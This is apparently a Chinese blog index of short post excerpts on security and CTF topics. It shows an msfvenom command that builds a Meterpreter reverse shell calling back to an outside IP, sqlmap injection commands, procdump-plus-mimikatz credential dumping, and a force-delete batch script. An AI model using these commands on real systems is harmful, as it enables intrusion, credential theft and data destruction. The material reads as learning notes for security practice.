路漫漫其修远兮，吾将上下而求索

摘要： Linux base64工具（带有-d标志用于解码）： $ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d {"typ":"JWT","alg":"HS256"} 浏览器JavaScript控制台： >> atob("eyJ0eXAiOiJ 阅读全文

摘要： 什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准（(RFC 7519).该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（SSO）场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息， 阅读全文

摘要： msfvenom的shell在windows中的使用 msfvenom生成shell.exe msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe 输入 阅读全文

摘要： get方式的注入用 sqlmap -u url+参数 post方式通过保存请求到文件，然后用 sqlmap -r xxx.txt 如果上面无效时，可以试试添加--data="name=value"来指定传参进行测试注入。 下面的情况可以用sqlmap -u url --data="name=valu 阅读全文

摘要： *.E01文件经过百度得知是镜像压缩文件，可以用IsoBuster软件打开，也可以用AccessData FTK Imager工具打开，加载后获取到SAM文件和system文件 Kali中chntpw工具找出SAM文件的用户名 用SAMInside工具导入SAM和System找出用户名 用windo 阅读全文

摘要： 小米手机： User-Agent: Mozilla/7.0 (Linux; U; Android 9.0; zh-cn; MI 11 Build/NRJJ90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359. 阅读全文

摘要： robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时，它会首先检查该站点根目录下是否存在robots.txt，如果存在，搜索机器人就会按照该文件中的内容来确定访问的范围；如果该文件不存在，所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。 阅读全文

摘要： 1、先下载两个工具 procdump是微软官方Sysinternals工具合集中的（https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump） mimikatz开源项目地址（https://github.com/gentilki 阅读全文

摘要： 通过vbs脚本控制方向盘按键 保存下面代码为.vbs文件，并执行 Set objShell = CreateObject("Wscript.Shell") do WScript.Sleep 2000 objShell.SendKeys "{RIGHT}" objShell.SendKeys "{DO 阅读全文

摘要： 保存为.bat文件，用的时候拖动任意文件或文件夹到该bat上即可删除。 DEL /F /A /Q \\?\%1 RD /S /Q \\?\%1 pause 阅读全文